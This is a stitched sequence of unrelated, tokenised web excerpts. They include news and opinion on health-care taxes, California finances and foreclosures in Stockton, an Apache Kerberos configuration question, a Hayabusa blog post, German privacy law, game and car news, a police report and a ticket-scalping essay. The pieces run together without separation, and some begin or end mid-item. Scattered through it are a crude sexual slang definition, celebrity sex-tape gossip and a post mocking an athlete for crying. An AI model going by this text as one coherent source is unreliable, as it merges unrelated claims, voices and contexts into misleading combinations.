" Jetstar tells me that these are two isolated incidents , but I think other people will say they 've had two strikes in two weeks , " he said .
" I think it is worth myself , being the Government spokesperson , and the Human Rights Commissioner meeting with the leader of Jetstar to identify how things can improve .
I think it 's embarrassing . "
There is a middle - class tax time bomb ticking in the Senate ’s version of President Obama ’s effort to reform health care .
The bill that passed the Senate with such fanfare on Christmas Eve would impose a confiscatory 40 percent excise tax on so - called Cadillac health plans , which are popularly viewed as over - the - top plans held only by the very wealthy .
In fact , it ’s a tax that in a few years will hammer millions of middle - class policyholders , forcing them to scale back their access to medical care .
Which is exactly what the tax is designed to do .
The tax would kick in on plans exceeding $ 23,000 annually for family coverage and $ 8,500 for individuals , starting in 2013 .
In the first year it would affect relatively few people in the middle class .
But because of the steadily rising costs of health care in the U.S. , more and more plans would reach the taxation threshold each year .
Within three years of its implementation , according to the Congressional Budget Office , the tax would apply to nearly 20 percent of all workers with employer - provided health coverage in the country , affecting some 31 million people .
Within six years , according to Congress ’s Joint Committee on Taxation , the tax would reach a fifth of all households earning between $ 50,000 and $ 75,000 annually .
Those families can hardly be considered very wealthy .
I have an apache instance that uses kerberos for SSO with an internal application that we have running .
However the performance is very very poor .
I believe from a tcp dump that when a user hits some of our dojo forms on the application that apache is making calls to our KDC to ensure that the user has permissions to those files .
As the dojo library is quite hefty , this is taking a long time to run and seriously impacting the performance of dojo based forms to load .
We are using mod_auth_kerb and currently our httpd .conf file looks like this .
< Directory " /opt/myapp/public " >
AllowOverride All Order allow , deny Allow from all AuthType Kerberos AuthName KerberosLogin KrbServiceName HTTP/taz.uk.mydomain.com@MYDOMAIN.COM
KrbMethodNegotiate On KrbMethodK5 Passwd On KrbAuthRealms MYDOMAIN.COM Krb5KeyTab
/etc/krb5.keytab require valid-user </ Directory >
Is there a command that I can put into the httpd .conf file or a .htaccess file that I put into the javascript directory that holds the dojo library , to tell apache not to authenticate the access to the directory ?
I believe that this will improve the site performance 100 fold .
( Yes it really is that bad )
Thanks
Hello all ,
Could anyone , please , please , post the BBA pain a l'ancienne recipe ....
I want to start it tonight and ( I do n't have the book ) I wo n't be able to drop - by the library to pick it up :(
Thanks sooooo much
Srishti
I know my kids get tired of me tilting my head out from behind my laptop screen and proclaiming the next great achievement from the space realms : " Hey kids , Hayabusa is on its way back ! " .
This time however , their little faces actually turned toward me and smiled : " Hayabusa ?
Are you talking about Halo ? " .
No !
Hayabusa is also the name of a Japanese spacecraft launched in 2003 .
Its mission was to rendezvous with asteroid 25143 Itokawa , land ( sort of ) , collect small rock and dust samples , take off , and return to our home planet .
If all goes well , the little robot will fall back to Earth in June 2010 and become the first Earth vehicle to visit an asteroid and return samples successfully !
The mission hit a few roadblocks along the way and the JAXA scientists are not sure if the bot was able to capture much material during its visit to Itokawa .
However , due to some big - brain thinking and some on the fly engineering , the Hayabusa team says everything is on track for next June .
While much of the spacecraft will burn up as it falls through the Earth 's atmosphere , the precious asteroid dust will be protected in a re-entry proof capsule as it crashes into the Australian outback .
Another great tech achievement for Hayabusa is the use of ion engines .
Initially put through its paces with NASA 's Deep Space 1 in 1998 , the ion engines is becoming more popular as the primary means of thrust for space missions .
For long term trips where time to arrival is not a major issue , the slight thrust of small ion engines are truly efficient compared to the amount of propellant required .
So to our Australian readers , keep your eyes peeled for a burning hunk of metal as it blazes across your skies in six months or so .
While not quite extraterrestrial , the package that comes with it will truly be from out of this world !
The Los Angeles Times reports that the Governator is expected to appeal to Washington for some $ 8 billion in bailout funds , and is holding hostage CalWORKS , the mainstay of California 's welfare program ( and a long standing and favored catamite to the country 's progressives ) in the unlikely event he does n't get it .
Arnie also seems poised to select this as an opportune time to re-open the question of drilling for oil off the Santa Barbara coast .
Of course , a number of other things are weighing on California 's debt addled mind .
For instance , the impact of shiny new health care cost reductions on the states massive debt load .
Readers will be well aware of our view of the cost shell game being played with this legislation , but , we ask you , what is the point of hoisting $ 4 billion or so in expenses on California if the Federal government is going to have to send $ 8 billion right back into the state as a result ?
Optics , of course .
Still we are fairly sure this will be an isolated incident as we cannot imagine that any other states are facing fiscal issues that would prevent them from easily paying for the cost savings the new health legislation will bless them with .
Of course , California does n't seem to have expected federal legislation that would result in such a severe fiscal emasculation as is performed in the present bill and , given that Arnie was one of the few Republicans of any stripe to support the legislation , you can almost taste the sour sting of betrayal in the letter he wrote Nancy Pelosi yesterday :
Dear Madam Speaker ,
As one of the few governors in the nation who attempted to pass comprehensive health care reform at the state level , I have great appreciation for the historic effort you are leading in Congress .
In fact , I am one of the only Republican elected officials in the country to publicly support the President ’s health care reform efforts .
When asked for my support , I was assured that federal legislation would not increase costs to California or include new unfunded mandates .
Unfortunately , under nearly every scenario we can predict , the federal health care reform legislation being debated would cost California ’s General Fund an additional $ 3 billion to $ 4 billion annually .
This crushing new burden will be added to a safety net that is already shredding under billions of dollars in unfunded federal mandates that we are struggling to meet .
Medicaid is a partnership program between the federal government and the states .
As the partner responsible for implementing this program , I am telling you that our Medicaid program is already at the breaking point , and if federal health care reform is passed without addressing the underlying faults in the system , health care reform will fail .
Sucker .
While we explore the fate of California , it is illuminating to notice the tired pattern of sovereign extortion in the form of the threat of imminent fiscal violence to favored ( or even critical ) government services .
Why is it that municipalities ( or the Federal government for that matter ) seem to uniformly respond to looming fiscal crises by announcing potential cuts in , for example , " ... the In - Home Health Care Services program for the disabled and elderly poor , " or police , emergency services , fire , and the department of motor vehicles ?
Of course , we know the answer .
And so , California will , in all likelihood , get a large , steaming hunk of Federal extortion payments , making even more explicit the Federal Government 's role as the lender of last resort for the abysmal failure of progressive ( and expensive ) municipal experiments in everything from welfare to green energy to hopelessly mathematically challenged defined benefit programs .
Given the total surrender of federalism and the wholesale abandonment of the republic , the clever Zero Hedge reader may consider adding to their municipal credit default swap pricing model a variable that captures expected gubernatorial expertise in fiscal extortion and lobbying .
We highly suspect that the last states to fail will be those who exhibit the highest levels of operational excellence in extracting liquidity from an increasingly sore Federal teat .
California seems to be off to a good start , but then their thirst for mother 's milk is awfully daunting .
Publications generally comply with the law , Mr. Höppner said , by referring to “ the perpetrator  or , Mr. L. ”
But with such a well - known case , he said , expunging the record “ is difficult to accomplish  and , morally speaking , rightly so . ”
The court ’s goals in the 1973 decision were laudable , he said , but the logic might not be workable in the Internet age , when archival material that was legally published at the time can be called up with a simple Google search .
The question of excising names from archives has not yet been resolved by the German courts , he said .
Collisions in court involving free speech , the Internet and differing national laws are not new .
In 2000 , French courts fined Yahoo and ordered it to block access to auctions of Nazi memorabilia .
The company fought the ruling in American courts , which upheld Yahoo on First Amendment grounds , but that decision was later overturned on jurisdictional grounds by the federal appeals court in San Francisco .
Yahoo removed the auctions .
Michael Godwin , general counsel of the Wikimedia Foundation , a nonprofit organization in San Francisco , said the foundation “ does n’t edit content at all , unless we get a court order from a court of competent jurisdiction . ”
The online encyclopedia is written and edited by armies of independent volunteers , and “ if our German editors have chosen to remove the names of the murderers from their article on Walter Sedlmayr , we support them in that choice , ” said Mr. Godwin , adding , “ The English - language editors have chosen to include the names of the killers , and we support them in that choice . ”
Wikipedians , as they call themselves , have removed or restricted information in the past .
Wikipedia ’s founder , Jimmy Wales , personally appealed to editors to keep off the site any information about the kidnapping of David Rohde , a Times reporter seized by the Taliban in Afghanistan , until his escape .
Mr. Godwin noted there were more than 12 million articles on Wikipedia and just 30 paid employees of the foundation , who largely maintain the software and run the computer servers .
“ We have one guy who handles legal complaints , ” he said .
“ Me . ” The idea that this small crew could police such vastness “ does not scale , ” he said .
The state in which the outside temperature falls below negative fifteen degrees Fahrenheit , usually with a windchill .
It is when , regardless of previous sexual preference , one wishes to be fucked in the ass for no other reason than the warmth it would provide .
We believe in excellence in execution of every task , whether it is a small assignment or a large global campaign .
We ( Website Designing Company in Faridabad ) have a rich portfolio of 300 + customer , many of whom stayed with us for More than 10 years and for whom we provided website designing , development , and digital marketing services and achieved business goals by using original ideas with proven practices on time and within the budget .
Our decade - long experience coupled with technical expertise as a website designing company in Delhi has helped us to surpass client ’s expectations .
We are an innovatively led , strategically driven techno - friendly digital marketing company .
We have created many robust brand experiences for our clients worldwide .
Being one of the best digital marketing companies in the country , smartech has been in the front line to provide expert online marketing solutions , right from web design and development to SEO services .
Smartech has a team of qualified SEO experts that provides full - fledged SEO Services .
Our zealous SEO professionals implement the most comprehensive strategies to boost the ranking of your website and build a brand value across the web !
With the support of a creative mind and professional ’s expertise , our team of web designers can offer designing solutions for your brand .
By delivering unique and unmatched innovative web designing solutions , we have been able to create a niche in the market .
Applying contemporary methodologies and innovative approach has helped us to present designing solutions that will help you stay ahead of your competitors .
And WE intend to deliver the same for YOU !
It was lost in the mail for some time .
I recieved it around March but I absolutely loved it !
I 'm a wolf and a husky owner and the lamp had them both on it .
Goes great in my living room .
Thank you !
Talk about a devastated landscape ...
Any which way you look , the housing numbers are relentlessly bad .
For example , 23 % of U.S. homeowners owe more on their mortgages than their properties are worth , according to Ruth Simon and James R. Hagerty of the Wall Street Journal .
They possess , in the vivid lingo of the housing industry , “ underwater mortgages . ”
Among them , 5.3 million households have mortgages that are at least 20 % higher than their home ’s value , 520,000 of whom have already received default notices .
In the meantime , home - loan delinquencies and home repossessions are now at record highs .
According to E. Scott Reckard of the Los Angeles Times , by the end of September , “ one in seven U.S. home loans was past due or in foreclosure , ” and the chief economist for the Mortgage Bankers Association expects the number of foreclosures to keep rising deep into 2010 .
Worse yet , foreclosures on large rental - unit buildings are also on the rise .
This means , reports Robin Shulman of the Washington Post , that not just homeowners but renters are now being swept up in the housing crisis as landlords of apartment buildings in trouble let upkeep go while maintenance problems soar .
Nor are the latest figures on home prices offering much cheer .
Two key price indexes released last week , write David Streitfeld and Javier Hernandez of the New York Times , “ indicated that the momentum the housing market showed over the late spring and summer is faltering . ”
There was , however , a rare ray of good news amid this dismal scene : Wall Street has , according to Louise Story of the Times , figured out how to make money from the mortgage mess by “ buying billions of dollars ’ worth of home loans , discounted from the loans ’ original value ” and pocketing profits while shifting “ nearly all the risk for the loans to the federal government -- and ultimately taxpayers . ”
With this grim picture in mind and with California one of four Sunbelt states that account for 43 % of all foreclosures started in recent months , we sent TomDispatch regular Andy Kroll to the Ground Zero of the mortgage crisis to see what an economic “ recovery ” looks like firsthand in post - meltdown America .
Tom
At the end of a week in mid-October when the Dow Jones soared past 10,000 , Goldman Sachs recorded “ just another fantastic quarter ” with a $ 3.2 billion quarterly profit , JPMorgan Chase raked in a cool $ 3.6 billion , and a New York Times headline declared “ Bailout Helps Revive Banks , And Bonuses , ” I spent a Saturday evening with about 100 people camped out in a northern California parking lot .
A passerby , stealing a quick glance , might have taken the crowd for avid concertgoers staked out for tickets .
There was , however , no concert here -- just weary , huddled souls , slouched in vinyl folding chairs , covered by blankets , windbreakers , and knit hats against a late autumn chill .
A ragged line of them wound through the lot outside the entrance to the Cow Palace , a dingy arena decades past its prime on the southern edge of San Francisco .
These people , and thousands more like them who had streamed into the arena all day long from as far away as Los Angeles , Phoenix , and Las Vegas , were unemployed , broke , bankrupt , or at their wit ’s end .
They were here waiting for help -- for their chance to make it inside the warm arena to participate in “ America ’s Best Mortgage Program . ”
For these homeowners , the last shot at saving their homes -- and their personal version of the American Dream -- lay under the glow of the floodlights in a expanse where tiers of brown and yellow seats encircled a desk - lined floor more accustomed to livestock shows and rodeos .
This was , in fact , the latest stop on the “ Save the Dream ” tour , a massive homeowner - relief event organized by a consumer advocate group , the Neighborhood Assistance Corporation of America ( NACA ) .
The turnout was staggering : close to 45,000 desperate homeowners showed up during NACA 's five - day stand at the Cow Palace for the chance to renegotiate their disastrous subprime mortgages or sky - high interest rates or interest - only payments .
For them , this event beat any chance at a star - studded concert -- and best of all , it was free .
Inside , homeowners received housing - related financial advice and met with NACA ’s counselors , a stoic crew , always with coffee or energy drinks in hand and clad in red and yellow T - shirts with STOP LOAN SHARKS and SHARKS BEWARE emblazoned on their backs .
Here , homeowners could have their income , taxes , and spending habits analyzed , and possibly walk away with a monthly mortgage payment that actually fit their situations .
With that payment figure in hand , homeowners could then meet with representatives from their mortgage companies in the same arena and try to hammer out new terms on more affordable mortgages .
The process would save many of them thousands of dollars , defuse an explosive mortgage , even avert foreclosure .
To boost morale , NACA officials occasionally ushered chosen homeowners to a makeshift lectern where each offered a glowing testimonial over a PA system to the work taking place .
They spoke fervently of new fixed - interest loans and fought back tears , while thanking their counselors , friends , NACA , and -- regularly -- God .
“ It ’s a beautiful thing , ” said Venus Roberts , a homeowner from Los Angeles who came away from the event with lower mortgage payments .
I caught up with her in the arena ’s parking lot as she was heading for the Amtrak station and a train home .
A small , floral - printed suitcase in tow , Roberts had arrived early Friday morning , waited all day long , and finally spent the night in a nearby hotel .
Back in line Saturday morning , she finally saw a counselor .
The wait , she assured me , could n’t have been more worth it .
In the sort of reverential tone normally reserved for the miraculous , she avowed , “ NACA is spreading the news that help is here . ”
Not everyone was so inspired .
Near the tables behind which bank representatives were arrayed I spoke with Maria Hernandez of San Jose , who was fuming about her meeting with representatives from the bank Wachovia .
Hernandez , haggard and emotional , struggled for words .
“ It was a… what ’s the word ?
A mockery .
Yes , a complete mockery . ”
Wachovia , she insisted , had failed customers like her , letting desperate people wait in line for days only to send them home essentially empty - handed .
( No representatives of mortgage companies were made available for comment at the event . )
So impassioned was Hernandez that a small crowd of the frustrated and curious soon gathered around her .
Even Bruce Marks , NACA ’s pugnacious CEO , stopped to hear Hernandez .
“ All this information is related to us , then we get to Wachovia , and for what ? ” she asked indignantly .
“ To just come back another day ?
Or have your kids in the van spend another night here ? ”
Most of the people I met at “ Save the Dream , ” though , were n’t either as elated as Roberts or as disgruntled as Hernandez ; they were still in limbo , waiting in line , their futures hanging in the balance .
That line began in the parking lot and , once inside , filled huge sections of the arena ’s seats where thousands of bleary - eyed homeowners , some there for up to 36 hours , waited to see a counselor or to meet with Spanish - speaking advisers .
Those earlier in the process sat in yet another section of the cavernous arena before an initial orientation workshop , a sort of Home Economics 101 held in an adjoining annex .
Some of the homeowners I interviewed that Saturday had already been in line for 10 or 12 hours on the previous day , and had returned before sunrise once again to take up their posts .
Some had slept under blankets in their seats ; others clutched rolled - up sleeping bags clearly meant for an expected camp - out that night .
As I waded through the main seating area around midday , Ed Kidwell , a burly , boisterous truck driver from Fontana , California , sporting a University of Southern California hat , stopped me .
Noting my camera and pad , he wrapped a big arm around my shoulder as if we were lifelong friends reuniting .
“ I ’m just waiting for some good news to take home to take the stress off my wife and kids , ” he explained .
Though dog - tired -- he ’d arrived in the wee morning hours -- Kidwell assured me he ’d do just about anything to get his mortgage fixed .
As proof he offered to sing me a mortgage - themed song in the style of soul singer Sam Cooke .
With a few thousand pairs of eyes trained on us , Kidwell promptly cleared his throat and belted out lyrics that featured some mix - and - match combination of the words “ relief , ” “ modification , ” “ IndyMac , ” and “ baby . ”
A man crooning about mortgage relief , retired couples camping in a parking lot for counseling appointments , 4,000 exhausted “ fans ” cheering announcements of 2 % fixed interest rate loans as if they were so many slam dunks -- after a day at “ Save the Dream , ” you ’d be forgiven for thinking that , when it came to working class and middle class Americans , the housing market and the American economy in general had n’t exactly improved since its implosion in the fall of 2008 .
Surveying the organized chaos in the Cow Palace , you might also be forgiven for thinking that all the talk of “ recovery ” was little more than that -- unless you happened to work for Goldman Sachs .
Indeed , the beleaguered faces of the desperate homeowners at “ Save the Dream ” brought to my mind a famous Dorothea Lange photo of a Depression - era bread line in San Francisco ’s Mission District , an image captured 75 years earlier just miles from where I stood .
If you happened to be at the Cow Palace that Saturday , the daily news about the very financial players who had fueled the subprime debacle and the global economic collapse returning to their risky , overleveraged ways could seem little short of surreal .
Here , after all , was a reasonable selection of what the media likes to call “ Main Street ” mired in debt , clinging to homes at the edge of foreclosure , struggling through a jobless “ recovery . ”
A “ recovery , ” that is , in which the true underemployment rate is 17.5 % , average employee wages continue to drop , and the housing market is in shambles .
The 937,840 foreclosure filings from July to September of 2009 set yet another industry record .
So many people are returning to school that some community colleges have extended classes until 2 A.M. and are turning away hordes of new students .
No one -- not a single person -- I interviewed at “ Save the Dream ” agreed with Treasury Secretary Tim Geithner or Federal Reserve chairman Ben Bernanke that their country was on the economic rebound .
Mary McCleese , an Oakland resident , who was , at least for the moment , keeping her home thanks to NACA ’s help , was typical .
“ If you look around , you see how many people is out of work , number one , and you see how many people is in foreclosure or lost their homes or in default because they 've lost their jobs , ” she said .
“ That tells you right there what the economy is doing . ”
II .
Housing Meltdown , Ground Zero
About a week before the “ Save the Dream ” event , I rented a car and headed east from San Francisco toward Ground Zero of the subprime mortgage meltdown .
Visiting one of the hardest hit cities in the country would , I reasoned , offer another measure of whether the “ green shoots ” of “ recovery ” were truly pushing up through the overleveraged earth -- better surely , when it came to ordinary Americans , than the rising price of AIG ’s stock or the Dow ’s ascent .
While many cities can contest for the title of “ most devastated by the meltdown , ” including metropolitan hubs like Las Vegas and Fort Lauderdale or suburban areas like Bakersfield , California , or Mesa , Arizona , it turns out I did n’t have far to drive .
After all , Stockton , California , an arid , unremarkable city in the San Joaquin Valley , was only 80 miles away .
A place for which “ decimated ” is n’t hyperbole but a mathematical statement of fact , Stockton , with its population of around 300,000 , recorded nearly one foreclosure for every 10 houses in 2008 .
As other towns like to call themselves “ the artichoke heart of America ” or “ America ’s Bread Basket , ” Stockton could call itself the heart of America ’s subprime meltdown .
It ’s an hour - and - a - half drive from San Francisco to Stockton , up through the Altamont Pass with its rows of wind turbines , then down into the Central Valley ’s wide expanse and , via I - 5 , into the open streets of Stockton , a city that has often seemed to embody the vicissitudes of the housing crisis .
In February 2008 , for instance , national media outlets latched onto the story of a local man who , struck by the entrepreneurial spirit , started a business called Greener Grass Co .
His service : Spray - painting the dead , burnt - out yards of foreclosed houses a hue of green so realistic that the local newspaper described the painted lawns as “ good enough for a golf course or a professional football stadium . ”
When I pulled into Stockton last month , more than a year had passed since CNBC had pegged it the “ Foreclosure Capital of the World ” -- and painting lawns green was still de rigueur .
Local government workers had now taken up the job .
Dead lawns , the thinking went , signaled empty houses and so attracted trouble .
Painting lawns , the city hoped , might dissuade people from breaking into deserted homes .
Around mid-morning , I pulled into the Little John Creek neighborhood near the airport on the city ’s southern outskirts , and one of the first things I saw was an abandoned house displaying their handiwork .
The green was , in fact , a sickly teal hue and had been laid down in bizarre stripes on a dead lawn on Togninali Lane .
It was , to say the least , a far cry from fairways , football stadiums , or even the perfectly real turf on neighboring lots where grass grew and people lived .
Here , the houses without occupants stood out like so many missing teeth in a wide smile .
On just about every street , foreclosures dotted the landscape : stucco homes with sheriff ’s notices taped to front doors , FOR SALE signs askew in front yards , lawns burnt into suburban hay by the summer sun that had yet to receive their eerie coats of green .
I parked near foreclosed house after house and walked up front paths and driveways to peer through windows and over backyard fences .
Most of the homes were starkly empty , often gutted -- “ trashed out ” in industry parlance -- with not a trace of their former owners .
In a few , though , there were hints of lives lived and lost .
A deflated basketball , a toy truck , and a skateboard sat in the backyard of a tan house with a two - car garage in Little John Creek , the back porch light still unnervingly aglow in broad daylight .
At a nearby house , the front flower bed was filled with foreclosure - crisis detritus , including the business cards of realtors and mortgage specialists .
The half - dozen neighborhoods I drove or walked through in various parts of Stockton proved but repeats of Little John Creek , still littered with empty homes -- “ decimated ” -- more than a year after the financial meltdown occurred .
Though Stockton ’s foreclosure rate has dropped from 9.5 % of the city ’s houses in 2008 to 3.5 % in the third quarter of 2009 , that ’s nothing to brag about .
It remains the fourth - highest rate in U.S. metropolitan areas .
Before arriving , I had envisioned the foreclosure crisis as a somewhat localized event with the majority of such homes in a limited number of lifeless neighborhoods .
In Stockton , at least , the opposite was true : foreclosed homes were salt - and - peppered around the city .
They often sat singly or in twos and threes among occupied homes in still lived - in neighborhoods , in cul - de - sacs where kids played basketball , on blocks where neighbors waxed their cars on a Sunday afternoon , or down streets where friends were barbecuing in open two - car garages .
The thought of an emptied - out neighborhood may pack a more visceral punch for a story , but from an economic or social standpoint , a mix of foreclosed and occupied properties is far more damaging to those still in their homes .
A report from the Center for Responsible Lending estimates that foreclosures will cost neighbors $ 500 billion in home value in 2009 , or an average of $ 7,200 for 69.5 million homes .
A study by the Federal Reserve Bank of Chicago also found that when foreclosures increase , so , too , does violent crime in neighborhoods .
For those who have clung to their homes in hard - hit areas , the value of those investments has plummeted , while the ability to sell and so move elsewhere -- to take a new job or live in a cheaper market -- is now greatly hindered .
In other words , a crisis like this one in a city like Stockton is not easily escaped .
III .
A Bubble Grafted onto Rubble
The billboards and roadside ads lining Stockton ’s streets like campaign signs repeatedly proclaim : “ Mortgage Modification Works ! ” and “ Call for Loan Modifications ! ”
I counted five of them on one block alone , and together they created the impression that help had arrived .
Yet I knew they were scams , with anonymous local phone numbers and little other identification , meant to relieve desperate homeowners in a city not lacking in desperation of whatever money they had left .
The subprime meltdown , as it turns out , has been a boon for crooks preying on the vulnerable .
( Not long ago , the FBI announced a nine - month mortgage fraud investigation in Florida involving 500 defendants and $ 400 million in loans . )
Outnumbering the scams three to one along Stockton ’s main thoroughfares were glossier professional ads .
At almost every intersection they urged locals to take advantage of the federal government ’s recently extended $ 8,000 homebuyer tax credit .
Never mind that this tax credit has been criticized by economists and experts alike who say it could create a new housing bubble amid the devastation .
Even while the rubble of the subprime meltdown is still smoking , developers here in California ’s Central Valley are already dreaming again about speculation on new homes .
At one point , I followed a succession of these tax - credit come-ons out to a subdivision called Cobblestone Bay .
There , at the city ’s edge , new homes with white picket fences are popping up at the edge of the undeveloped valley beyond .
It was hard , having spent much of the day in foreclosure - riddled neighborhoods , to walk around this new development without a sense of déjà vu .
I could n’t shake the feeling that Cobblestone Bay was already being prepared for future foreclosure .
All it lacked -- for the time being -- was the fake green lawns .
In fact , all the ad trails touting the $ 8,000 tax credit I followed led to subdivisions like this one , cookie - cutter communities lacking distinguishing characteristics that might remind you of California ( rather than , say , Arizona or Florida ) .
These were , of course , the very kinds of neighborhoods that were thrown up wherever land was cheap in the California boom construction years of 2005 and 2006 , and the kinds of neighborhoods now in subprime ruin .
As my visit was ending and the sun disappearing behind the valley ’s edge , I made one last stop on the outskirts of town at the ornate entrance to a subdivision called Golden Eagle .
It included , as its centerpiece , an impressive five - tiered water fountain , while large wrought iron gates depicting eagles - in - flight separated Golden Eagle from the surrounding neighborhood .
Except there was no Golden Eagle -- just a single unfinished house on the weedy , 15 - acre property .
Construction equipment sat motionless on the dusty earth .
A placard outside the gated entrance trumpeted grand expectations , but the new neighborhood looked stillborn .
I took down a phone number from the entrance placard and , later that week , called Golden Eagle ’s developer , a man named Tom Ruemmler .
He told me that he had been on the project for more than three years , and envisioned it as a luxury , energy - efficient community for the green future .
Ruemmler was no rube when it came to mortgages and the housing market : in the mid-1990s , he won a multi-million dollar mortgage - fraud whistleblower suit involving a Sacramento bank whose Stockton loan office he once managed .
Who , I asked him , would buy a custom , high - end , zero-energy , hypoallergenic home in a city leveled by foreclosures where housing prices have plummeted and nearly one in six people are unemployed ?
“ I ’m dealing with a different clientele , ” he responded , bridling at the question .
“ I ’m dealing with probably one - fiftieth of one percent of the buying public . ”
Did he honestly think he could sell 30 of these lots to such a small percentage of people in a place like Stockton ?
" Now is the time to build a custom home , " he insisted .
“ Somebody out there is going to have money that has somebody in the family that has allergies . ”
And out in the San Joaquin Valley , with a foreclosure on almost every block , he intended to find them .
Andy Kroll works for Mother Jones magazine and is a frequent contributor to TomDispatch .
He lives in San Francisco .
Carrie Prejean demanded more than a million dollars during her settlement negotiations with Miss California USA Pageant officials -- that is , until the lawyer for the Pageant showed Carrie an XXX home video of her handiwork .
The video the lawyer showed Carrie is extremely graphic and has never been released publicly .
We know that , because TMZ obtained the video months ago but decided not to post it because it was so racy .
Let 's just say , Carrie has a promising solo career .
We 're told it took about 15 seconds for Carrie to jettison her demand and essentially walk away with nothing .
As we first reported , the Pageant is paying around $ 100,000 to her lawyers and publicist -- a fraction of her bills .
She pockets nothing in the settlement .
After the first teaser / trailer for Prince of Persia : The Forgotten Sands was shown during the Video Game Awards ceremony last weekend , Ubisoft has released some pieces of concept art as well as some further details for the game .
Ubisoft has stated that the game will be set inbetween the events of 2003 ’s Prince of Persia : The Sands of Time and 2004 ’s Prince of Persia : Warrior Within .
In the game , the Prince will visit the kingdom of his brother following the events in Azam during The Sands of Time .
The Prince will once again wield the power to manipulate time and the game will utilize the Anvil engine , which also powered both next - gen instalments in the Assassin ’s Creed series and 2008 ’s Prince of Persia .
Prince of Persia : The Forgotten Sands is planned to release around the same time as the Prince of Persia : The Sands of Time film , both of which are set for May 2010 .
The game will release on Xbox 360 , PC and Playstation 3 , with the Nintendo Wii , Nintendo DS and Sony PSP receiving unique adaptations of the game .
Three pieces of concept art for the game can be found after the jump .
Gwyneth Paltrow werd 27 september 48 jaar oud en besloot dat eens te vieren met een spannende foto van zichzelf in haar geboortekostuum .
Best toepasselijk op je verjaardag , en als je er ook nog eens ...
HILLSBORO – Police arrested and jailed a 42 - year - old man for littering after he threw down a ticket forbidding him from riding light rail , then angrily told off the officer who wrote the ticket .
Euphemistically speaking , Christian Alan Fletcher told the Hillsboro policeman that he would seduce the officer 's wife and place the barrel of the officer 's firearm ... well , where the sun does n't shine , police reports show .
The incident began at 4:10 p.m. Wednesday , when Fletcher , who is from the Florence area , was seen yelling and screaming with another rider of the Westside MAX at the
platform .
Based on what the officer saw , he wrote Fletcher a ticket , barring him from MAX trains for 90 days , said Lt. Michael Rouches , spokesman for the Hillsboro Police Department .
" We can see from the reports that he ( Fletcher ) is argumentative by nature , " Rouches said .
Fletcher walked a few feet after getting the ticket , then threw it on the ground , according to the officer 's reports .
The officer advised Fletcher that he could n't ignore the ticket , which would let Fletcher ride the train for 11 days until the restriction was processed .
Eventually , the officer insisted that if Fletcher did n't pick up the ticket , he would be cited for offensive littering .
At that point , according to Rouches , Fletcher swore at the officer and made the comments about the policeman 's wife , and the officer 's horse – which Rouches said the patrolman did n't have – followed by the suggestion of where the officer could best secure his weapon .
Fletcher was arrested on accusations of offensive littering and criminal mischief .
He was booked in the Washington County Jail in lieu of $ 2,500 bail .
Rouches withheld the name of the policeman , citing privacy concerns for the officer 's wife .
–
The Volkswagen CC Eco Performance concept is going for mean and green .
The well - appointed sedan unveiled at SEMA on Wednesday , is mean to the tune of 311 hp and 313 lb- ft of torque , which comes from a turbocharged , 2.0 - liter four - banger .
And it has a driving setting that reduces power , but returns a rating of 33 mpg on the highway .
It also gets plenty of the usual SEMA dressings , without being cartoonish .
It rides on 20 - inch wheels , and stopping is handled by Brembos with 14 - inch rotors .
Black chrome and a spoiler decorate the exterior .
And there 's what Volkswagen is calling " ghost " digital accents on the roof .
Inside are Recaro seats and piano - black accents .
The turbocharger upgrade by APR Tuned can run in three modes :
Full power puts out the engine 's top ratings ; GT drops you down to 252 hp and 268 lb- ft of torque ; and Eco further scales things back to 222 hp and 236 lb - ft .
Most critically , the Eco setting gets up to 33 mpg on the highway and 27 mpg in city driving , which is definitely green .
But frankly it 's a fairly marginal upgrade , as under full power it gets 24 city and 32 highway ratings .
The customization process started in August in California , and the package has a shot at showing up in some form on the CC in the future , said Andres Valbuena , Volkswagen product manager for the GTI and New Beetle .
This content is created and maintained by a third party , and imported onto this page to help users provide their email addresses .
You may be able to find more information about this and similar content at piano.io
This seems to be a classic , but I saw it for the first time today so I 'm sharing it .
It 's a song by an Italian singer that was made to sound like English but is just gibberish .
Well , aside from the odd part that sounds like " all right " .
Pretty impressive , and the song 's not too bad either .
Actually , the most impressive part is that for an English it really does feel like one should understand it , but not a single word can be made out .
It feels almost like what it feels like to see an optical illusion - you know it does n't make sense but your brain still tells you that it should and keeps working at figuring it out .
Football star Tim Tebow , perhaps best known for writing references to the Bible on his face for every game , was caught on camera crying this weekend following the Gators loss to Alabama .
Ironically , this weeks verse on Timmy boys face was John 16:33 , which reads “ I have told you these things , so that in me you may have peace .
In this world you will have trouble .
But take heart !
I have overcome the world . ”
Apparently Tim did n’t take the advice when he decided to cry like a little girl and sore loser at that .
The SEC Championship game was at stake in the match , with Alabama beating Florida 32 - 13 .
The Tim Tebow crying video as follows :
The Himalayan glaciers are the largest body of ice outside the polar caps , and they appear to be under threat from global warming .
Experts fear the ice , which is a source of water for hundreds of millions of people , could disappear with potentially catastrophic consequences .
Chris Morris reports .
Tags
" The scalper provides a type of scheduling insurance . "
Dozens of people among the throngs of jubilant fans hold crudely made cardboard signs featuring the words " I Need Tickets . "
Strangely , these people who , to an outsider , appear to be in desperate need of tickets for the big game , hold numerous tickets high above their head so everyone can see .
These people are the noble ticket scalpers .
They are a people scorned by athletic organizations , lawmakers , and many fans .
What are they doing to merit such ill will and legal persecution ?
Are they truly unscrupulous , greedy parasites who dupe fans and injure the athletic organizations ?
The United States does not have a federal prohibition on ticket scalping , but many states and even more municipalities have restrictions or outright prohibitions .
This is very unfortunate for everyone attending events in such areas because the ticket scalpers are real public servants .
The laws , to the degree that they are enforced , are actually responsible for the majority of the unfavorable things attributed to the practice of scalping .
Scalpers provide a myriad of services and benefits to a surprisingly large , and seemingly disconnected , group of individuals , businesses , and organizations .
Surely , they deserve praise rather than scorn and persecution .
One of the first beneficiaries of the Scalper 's services are the athletic organizations themselves .
This may seem surprising , since many event organizers go to great lengths to discourage fans from purchasing from scalpers .
Scalpers enable the teams to presell tickets much more effectively .
This is because scalpers are willing to purchase tickets in advance in the hope of being able to hold them for some period , and then resell them for a profit .
In contrast , many people are unsure , at the time of presale , if they will be able to take off from work or other obligations .
This uncertainty leads people to abstain from purchasing until they are certain they will be able to attend .
Thus , the ticket scalper enables the team to get their money earlier through ticket presales .
Scalpers absorb the time risk associated with events .
They absorb the risk associated with scheduling issues ( i.e. , whether or not fans can attend ) .
They also absorb the risk that unfavorable events could occur .
Anyone who has ever bought or sold a ticket knows that ticket resale values drop dramatically after a team has a few losses on its record .
